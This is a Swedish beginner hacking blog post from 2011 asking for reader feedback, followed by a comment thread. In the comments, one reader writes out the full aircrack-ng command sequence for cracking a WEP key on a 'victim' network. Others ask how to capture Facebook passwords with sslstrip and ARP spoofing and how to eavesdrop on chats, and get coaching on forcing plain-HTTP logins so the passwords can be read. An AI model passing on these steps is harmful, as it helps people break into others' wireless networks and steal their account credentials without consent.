lördag 23 april 2011

Lördag apr 23

Hoppas ni haft det bra nu i påsk och hoppas ni det gått bra att läsa den här bloggen!

Idag vill jag helst se så att ni lärt er lite ifrån den senaste posten och ni kan väl skriva i kommentarerna vad som kan förbättras med bloggen och vad ni lärt er hittills och vad ni tycker om det jag gör :)

MvH/

Ninja

(P.S jag kommer förmodligen lägga upp ett till inlägg om det bara är tillräckligt många som svarar idag)

15 kommentarer:

  1. Detta är en bra blog, det som skulle kunna bli lite bättre är att du förklarar lite mer VAD det är man gör. Skrev detta förut också, men jag tror att det är viktigt att veta vad man gör. Ett exempel var igår när ett vi skrev in i iptables, man vill nog veta lite mer vad det är man gör när man skriver PREROUTING bla bla, destination-port osv. Jag TROR jag vet vad allt det var för något, men om denna blog ska vara för nybörjare så är det nog bra om du förklarar lite nogrannare. Iallafall jag vill veta mer sånt :) Det är lättare att komma ihåg t.ex "Aha, nu måste jag göra en MITM attack som gör så att jag kan lyssna av trafiken mellan routern och mitt victim." Vet man VAD man ska göra så är det lättare att komma ihåg / lista ut vilka verktyg och kommandon man ska använda sig av.
    Mitt exempel kanske var lite dåligt, men jag hoppas du förstår. Bra blog annars, keep it up!

    /Toad

    SvaraRadera
  2. Toad@ Du verkar vara den mest aktiva läsaren här! :)
    Jag kommer gå igenom en MITM attack imorn tror jag eller på måndag, det beror på hur många som svarar idag.

    SvaraRadera
  3. Hej ninja!

    Har läst dina inlägg men inte kunnat prova än eftersom jag är ute och reser lite, men så snart jag kommer hem så ska jag kötta!

    Keep up the good work!
    Vi uppskattar vartenda inlägg enormt mulet ska du veta!

    SvaraRadera
  4. Haha, "mulet". Ska stå "mycket"!

    SvaraRadera
  5. jag tycker bloggen är bra men som Toad sa lite mer förklaring till vad man gör. sen undrar jag om man hackar en wep nyckel men inte data trafiken är tillräcklig hur får man den att öka och en liten förklaring på vad det är man gör vore grymt :)

    tack på förhand din blogg uppskattas

    SvaraRadera
  6. @xxxxx, det som behövs för att knäcka en WEP-nyckel är dessa kommandon:

    airmon-ng start wlan0 (för att fixa monitor mode)
    airodump-ng mon0 (hitta nätverket du vill knäcka)
    airodump -ng -c channel --bssid NätetsMAC --ivs -w dumpfile mon0 (t.ex:
    airodump -ng -c 1 --bssid 00:3f:21:54:5G.5O --ivs -w dumpfile mon0

    aireplay-ng -1 0 -a 00:3F:21:54:5G:5O -h 00:11:22:33:44:55 mon0 (första MAC är victim och andra är din MAC)
    aireplay-ng -3 -b 00:3F:21:54:5G:5O -h 00:11:22:33:44:55 mon0
    aircrack-ng -b 00:3F:21:54:5G:5O dumpfile*.ivs

    Detta ska vara det enda du behöver för att knäcka nyckeln.
    När aireplay sätter igång och börjar göra sitt så kan ibland gå väldigt snabbt och ibland väldigt segt. Det kan bl.a bero på signalstyrkan till nätverket.

    En sak som kan ställa till det är om nätverket har MAC filtering (Så att bara vissa MAC adresser får vara inne på nätverket). Är GANSKA säker på detta.

    Lycka till!, Ha tålamod!

    /Toad

    SvaraRadera
  7. Toad tack för hjälpen men det där förstår jag redan, men efter att jag skrivit aireplay-ng -1 0 -a 00:3F:21:54:5G:5O -h 00:11:22:33:44:55 mon0 (fast rätt mac ) så laddar den lite står bara open system typ sen stänger den av sig efter ett tag och i airodump rutan tickar typ datan skit segt vad är det för fel :(

    SvaraRadera
  8. @xxxxx, screenshot? Är uppe i fjällen så kan inte kolla hur det ska se ut :P Men är det likadant om du provar knäcka en annan WEP-nyckel? dvs ett annat nätverk? Om det funkar på ett och inte funker på ett annat kan det bero på att dom har något slags skydd eller något.... (skulle jag tro)
    Men gör som jag eller ninjafisk sa och låt det stå och jobba lite. Sedan kan du ta screenshot på vad som händer/inte händer.
    Står det något när den stänger av sig själv?

    /Toad

    SvaraRadera
  9. Hej, backtrack hittar inte mitt trådlösa nätverk så jag får köra ubuntu istället. Finns det några drivrutiner jag kan ladda ner och installera i bt så det funkar airmon-ng säger att chipset är RTL8187 driver r8187.

    Jag blir hela tiden urloggad ur wlan0 när jag skriver airmon-ng start wlan0 för att starta monitor mode, vad är fel? Och det går inte logga in igen trots rätt lösenord, kör WPA2 krypterat.

    SvaraRadera
  10. Tack ninja för allt hittills, grymt roligt att någon tar sig tiden och lär ut "hacking" om vi kan kalla det de än :) Jag har några funderingar, första: varför kan jag inte se facebook löenord när jag använder sslstrip och arpspoofing?:) kan inte heller se det med wireshark coh ettercap, beror det på att dom använder krypterat och isåfall hur dekrypterar jag det som då?:)
    Sen min adnra fundering: Skulle du kunna visa hur man kan avlyssna msn och facebook konversationer? har för mig att man ska kunna göra det genom wireshark, fast det finns säkert nåt bättre :)

    Hoppas på du orkar läsa allt babbel :D

    SvaraRadera
  11. @Niclas, @din första fundering:
    Det går att se lösenord till facebook också.
    Om du loggar ut från facebook och går in på http://www.facebook.com/ eller http://sv-se.facebook.com/ osv. Så ska det fungera
    Det som ställer till det ibland är att det blir:
    http://facebook.com
    Alltså https istället för http. http sänder på port 80, det är den vi valt att "attackera". Medan https sänder på port 443.

    Du ska alltså bara hålla utkik så att det är http://facebook.com
    Då ska det funka!

    Angående din andra fundering, googla! Det finns tusen olika tutorials osv för det.

    /Toad

    SvaraRadera
  12. men så fort jag klickar på logga in så går en över i typ 1 sec till https...
    Men hur gör jag om jag vill "attackera" port 443 då?:)
    okej ska kolla efter det:) när fortsätter bloggen egentligen?:)

    SvaraRadera
  13. Toad allt är lungt jag fick av nån dum anledning för mig att ha i nätverkskabeln när jag skulle hacka wep och de värkade ju strula till det så nu funkar det som de ska. :D

    Ingen som har en awsome wordlist för att knäcka wpa nycklar? (på svenska)

    Tack på förhand

    SvaraRadera
  14. @Niclas, det hände mig också.. skriv bara in http://www.facebook.com istället och refresha hit och dit. Då skall det nog fixa sig. Se bara till så att det är http:// när du väl skriver in username & password. Då ska det funka.

    prova bara skriva facebook osv. googla facebook, ta sv-se.facebook.com osv.
    Pröva dig fram!

    /Toad

    SvaraRadera
  15. Jag skulle tippa på att du skulle få många fler läsare om du lägger upp bilder på det mesta du gör ninja.
    En enkel bild på ett kommando i terminalen och visa hur det bör se ut.

    "airodump-ng -c 11 --bssid xx:xx:xx:xx:xx:xx -w /root/capture.cap mon0 "

    och lite pilar om vad allting är och vad det betyder.
    Försök framföra att man ska använda sig av hjälp kommandona mycket mer.
    till exempel om man kör fast så kollar man först
    airodump-ng --help --> sen google --> sen frågar dig.
    men om du bara refererar till att folk ska leta på google och söka lösningen där så kommer de troligtvis glömma bort eller struna i att kommentera vilket inte är så bra för din blogg.
    självklart är det lite tidskrävande men det är nog att föredra, även filmer.
    Om det faller dig att göra det, så kör inte notepad och förklara utan prata.

    och dessa reklamer du talar om hittar jag inga.

    ~dfz

    SvaraRadera